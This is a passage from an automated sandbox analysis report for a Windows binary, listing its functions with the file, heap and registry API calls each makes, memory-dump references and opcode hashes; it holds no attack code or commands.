                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 75d6dd57480013dfbfa4ad11a4eadc3456cf460811fa7a554d83103999341d55
                                        • Instruction ID: 68fccb581fa3053e3b10f119fb201c06ed7d799b012538ec047996354d845e44
                                        • Opcode Fuzzy Hash: 75d6dd57480013dfbfa4ad11a4eadc3456cf460811fa7a554d83103999341d55
                                        • Instruction Fuzzy Hash: B2113A31204709EFD7308F15C480BA7B7EAEF44754F10C42DEAAA87A50CBB1E945CB64
                                        Function 00725390 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0072500D: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,007231B9,00000001,00000364,?,?,?,0000000A,00000000), ref: 0072504E
                                        • _free.LIBCMT ref: 007253FC
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: AllocateHeap_free
                                        • String ID:
                                        • API String ID: 614378929-0
                                        • Opcode ID: fba82c0aa068c5562b6699b73bb903d727f3ae0d836859c59312de60e55cd848
                                        • Instruction ID: 776243d3668401e9f78cdcc1aee6ab3fdb2432442f54257a8554f07e2e8a7c3f
                                        • Opcode Fuzzy Hash: fba82c0aa068c5562b6699b73bb903d727f3ae0d836859c59312de60e55cd848
                                        • Instruction Fuzzy Hash: 380149B2204715ABE731CF65E885A5AFBDCEB89370F25061DE1C4832C1EA74A905CB74
                                        Function 0071E992 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aea155f1e03846a7945f3ef32b85c3da0dbec0b08e6aeb419bf15716d252f37c
                                        • Instruction ID: c1219078b3f4b1916bc53fd76a5790d84143624a611e07d002747061152d728e
                                        • Opcode Fuzzy Hash: aea155f1e03846a7945f3ef32b85c3da0dbec0b08e6aeb419bf15716d252f37c
                                        • Instruction Fuzzy Hash: 14F0A932501634DAD7313E6EAC09BDA36589F41334F144715FC65961D1EF7CE9828693
                                        Function 0072500D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,007231B9,00000001,00000364,?,?,?,0000000A,00000000), ref: 0072504E
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: 17731e06280e4d409bfc38afc1f147c1c6c75f9ef22a857f7c172deeded12d50
                                        • Instruction ID: a2af1c971ed990f9d21eb23b18069d5f569557fc4d604f874a94bc6c88416645
                                        • Opcode Fuzzy Hash: 17731e06280e4d409bfc38afc1f147c1c6c75f9ef22a857f7c172deeded12d50
                                        • Instruction Fuzzy Hash: 6CF0BE32A00A34ABDB311A76AC09E9A3758BF807A1B188125E815961D1CA3CDC4086E0
                                        Function 00723BB0 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,00716A99,?,0000015D,?,?,?,?,007185D0,000000FF,00000000,?,?), ref: 00723BE2
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: 657696305f1575f0b75acbecfe30fea71ddd88921a14de60d2580ab8fede031e
                                        • Instruction ID: 0eafd27d7c5fca6da5ac98d88a6f60af857feb0d894db97c5ff19a923ae957cf
                                        • Opcode Fuzzy Hash: 657696305f1575f0b75acbecfe30fea71ddd88921a14de60d2580ab8fede031e
                                        • Instruction Fuzzy Hash: 2DE0EDB120427897E7202F6ABC08F9A3668EF41BA0F150221FC06D20D0DB2CDE4082E0
                                        Function 006F63DB Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cf04ce699b3e486041dada1d904dbd38ed6598a35282de05cb8c51e85cd8dfcd
                                        • Instruction ID: be2777d12757969ef9e2f5eb466c6146229b674e5d45ffe4e133c0df1b603083
                                        • Opcode Fuzzy Hash: cf04ce699b3e486041dada1d904dbd38ed6598a35282de05cb8c51e85cd8dfcd
                                        • Instruction Fuzzy Hash: 9BF03972501716DFDB349F64D494862BBE6FF1432A324893EE2D783621C735A884DF50
                                        Function 006F653A Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: __fread_nolock
                                        • String ID:
                                        • API String ID: 2638373210-0
                                        • Opcode ID: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
                                        • Instruction ID: c96ec22758aff40bff690ba07082f1cbb5e0929b19bc62ef877678328e3b2d75
                                        • Opcode Fuzzy Hash: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
                                        • Instruction Fuzzy Hash: 54F0D47150020DFBDF05DF94C941AAEBB7AFB04318F208445F9159A152D336EA61EBA1
                                        Function 006F4154 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID:
                                        • API String ID: 176396367-0
                                        • Opcode ID: cc851593f1fd2b35ed972b3ca0519c9d6ab1506275115f6254acfd33543c89c1
                                        • Instruction ID: 72a1a14ff19552d82b7b0693a35d80562c9312d63cc7c8090f9b4c49147c7612
                                        • Opcode Fuzzy Hash: cc851593f1fd2b35ed972b3ca0519c9d6ab1506275115f6254acfd33543c89c1
                                        • Instruction Fuzzy Hash: BAD05E2234201075A769213D2D0FCBF455CCBC2BA0B04003EFA02CA1E5EC484C8200E0
                                        Function 0075E783 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetShortPathNameW.KERNELBASE(?,?,00007FFF), ref: 0075E7A2
                                          • Part of subcall function 006F84B7: _wcslen.LIBCMT ref: 006F84CA
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: NamePathShort_wcslen
                                        • String ID:
                                        • API String ID: 2021730007-0
                                        • Opcode ID: 3f539004dea24c5fa5d3d80cf2304d5255de34cb95408feaa6583b2018d2d694
                                        • Instruction ID: 1aaaa9263a09fe712f372ee975c714b94aa08a7ef111307584de190569dd38df
                                        • Opcode Fuzzy Hash: 3f539004dea24c5fa5d3d80cf2304d5255de34cb95408feaa6583b2018d2d694
                                        • Instruction Fuzzy Hash: FBE0CD725402245BCB2092589C05FEA77DDFFC8790F0540B4FD05D7259DD64ED808694
                                        Function 006F39DE Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006F39FD
                                          • Part of subcall function 006F84B7: _wcslen.LIBCMT ref: 006F84CA
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: LongNamePath_wcslen
                                        • String ID:
                                        • API String ID: 541455249-0
                                        • Opcode ID: 377209443c529dc94fad23277ad3ffad3e1a266f224717cfaff80a709b56e663
                                        • Instruction ID: df60bc98d3cff54259d4787beb3969abdedb0fbfd9a65987d9e5a66855ce9bcf
                                        • Opcode Fuzzy Hash: 377209443c529dc94fad23277ad3ffad3e1a266f224717cfaff80a709b56e663
                                        • Instruction Fuzzy Hash: D7E0CD725001245BC720A2589C05FEA77DDEFC8790F0540B5FD05D7259DD64DD808694
                                        Function 0075E753 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                        Download Yara Rule
                                        APIs
                                        • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 0075E76C
                                          • Part of subcall function 006F84B7: _wcslen.LIBCMT ref: 006F84CA
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: FolderPath_wcslen
                                        • String ID:
                                        • API String ID: 2987691875-0
                                        • Opcode ID: e521a1d2fd801cb76345db97dcb245c3cbfe82ed1481b03ed19446ce8f51102b
                                        • Instruction ID: 3cfd024946656ccae07b4718d46a2ba3f3cba13c6a450bc3a21def344be30d15
                                        • Opcode Fuzzy Hash: e521a1d2fd801cb76345db97dcb245c3cbfe82ed1481b03ed19446ce8f51102b
                                        • Instruction Fuzzy Hash: 23D05EA19002282FDF60A6749C0DDBB3AACC740220F0046A07C6DD3192E934ED4486A4
                                        Function 0075DA5C Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                        Download Yara Rule
                                        APIs
                                        • CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,0075D9DC,?,?), ref: 0075DA72
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: CopyFile
                                        • String ID:
                                        • API String ID: 1304948518-0
                                        • Opcode ID: a32d95919d1a82e28cb09b7a8937cf1090465207e28af03eb68b83393e491894
                                        • Instruction ID: 14d69e3829b7083317e1734a040874d5d7c252f8831b9fb6ab5d4ea30062e802
                                        • Opcode Fuzzy Hash: a32d95919d1a82e28cb09b7a8937cf1090465207e28af03eb68b83393e491894
                                        • Instruction Fuzzy Hash: 4ED0C7305D0209BBEF509B51CD07F99B76CE711B45F204194B101EA0D0D7B5A9199769
                                        Function 0073073A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,00000000,?,00730AA4,?,?,00000000,?,00730AA4,00000000,0000000C), ref: 00730757
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 862aefab0c5d76596048e05c452c3b3a451d3aba9ef0f99456a859c9b0f2f915
                                        • Instruction ID: 18b1a88bf2d1dba6c40c6868ce82b9f6e941b26fba90775001f97d2bc4ff62ee
                                        • Opcode Fuzzy Hash: 862aefab0c5d76596048e05c452c3b3a451d3aba9ef0f99456a859c9b0f2f915
                                        • Instruction Fuzzy Hash: E3D06C3204010DBBDF128F84DD4AEDA3BAAFB48714F118000BE1896060C736E821AB94
                                        Function 0075E9C5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,0075D755), ref: 0075E9C6
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 6913b93d5bba2f7c4fc7b78b37c1d94e697af5454e992c6b9a6e6fd50510c45e
                                        • Instruction ID: 181b227974c2387c80703067a6d6d176ec2a00bf2d3dccefe447382e92ca5cd9
                                        • Opcode Fuzzy Hash: 6913b93d5bba2f7c4fc7b78b37c1d94e697af5454e992c6b9a6e6fd50510c45e
                                        • Instruction Fuzzy Hash: 93B0923400061005BDBC0A381B0C4E9230068433B7BE81BD5E8B9961E2C37DAD0FE612
                                        Function 00766561 Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0075DB69: FindFirstFileW.KERNELBASE(?,?), ref: 0075DBE0
                                          • Part of subcall function 0075DB69: DeleteFileW.KERNELBASE(?,?,?,?), ref: 0075DC30
                                          • Part of subcall function 0075DB69: FindNextFileW.KERNEL32(00000000,00000010), ref: 0075DC41
                                          • Part of subcall function 0075DB69: FindClose.KERNEL32(00000000), ref: 0075DC58
                                        • GetLastError.KERNEL32 ref: 00766583
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                        • String ID:
                                        • API String ID: 2191629493-0
                                        • Opcode ID: 206ac019926b1406f5581c8e76d6bc8bc5092579e2bab03f6a44a9194d8e6316
                                        • Instruction ID: 9acc602691fa18e0a8a21c740aaa9f1fa00a9f4c5344e8aa3e38f7516eb15dca
                                        • Opcode Fuzzy Hash: 206ac019926b1406f5581c8e76d6bc8bc5092579e2bab03f6a44a9194d8e6316
                                        • Instruction Fuzzy Hash: D6F082312002088FCB14EF58D845B6EB7E6AF44320F05804DFA068B352CB74FC018B98
                                        Function 006F7953 Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                        Download Yara Rule
                                        APIs
                                        • CloseHandle.KERNELBASE(?,?,00000000,00733A1C), ref: 006F7973
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: 82ebb75bb19cc7114525beddd84fc47def381eda17bda93d56d09b0f7d715d46
                                        • Instruction ID: 1e0cf9e600d64250d5f3d6b9a1d3a7e8bc73858b9b5c89324ae3e24792919e62
                                        • Opcode Fuzzy Hash: 82ebb75bb19cc7114525beddd84fc47def381eda17bda93d56d09b0f7d715d46
                                        • Instruction Fuzzy Hash: 7FE0B675404B12CFC3314F1AE804462FBF5FFD23623214A2ED1E582660D3B05886DB50

                                        Non-executed Functions

                                        Function 0076A0FA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0076A11B
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0076A176
                                        • FindClose.KERNEL32(00000000), ref: 0076A181
                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0076A19D
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0076A1ED
                                        • SetCurrentDirectoryW.KERNEL32(007B7B94), ref: 0076A20B
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0076A215
                                        • FindClose.KERNEL32(00000000), ref: 0076A222
                                        • FindClose.KERNEL32(00000000), ref: 0076A232
                                          • Part of subcall function 0075E2AE: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0075E2C9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                        • String ID: *.*
                                        • API String ID: 2640511053-438819550
                                        • Opcode ID: 6c6b4b817c1af28e0f08e4737fac44b002fe5933feb6d5d7d8d3310cb5c72a0d
                                        • Instruction ID: 9275583285601428e29fb31e0fac965da17b8949047ba5f48a7105ff953ed58b
                                        • Opcode Fuzzy Hash: 6c6b4b817c1af28e0f08e4737fac44b002fe5933feb6d5d7d8d3310cb5c72a0d
                                        • Instruction Fuzzy Hash: BE31D271540219BECB24ABA4DC48ADE73ADAF85320F204151EC16B20D0DB7DDE85CF65
                                        Function 0077C7A3 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0077D2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0077C00D,?,?), ref: 0077D314
                                          • Part of subcall function 0077D2F7: _wcslen.LIBCMT ref: 0077D350
                                          • Part of subcall function 0077D2F7: _wcslen.LIBCMT ref: 0077D3C7
                                          • Part of subcall function 0077D2F7: _wcslen.LIBCMT ref: 0077D3FD
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0077C89D
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0077C908
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0077C92C
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0077C98B
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0077CA46
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0077CAB3
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0077CB48
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0077CB99
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0077CC42
                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0077CCE1
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0077CCEE
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
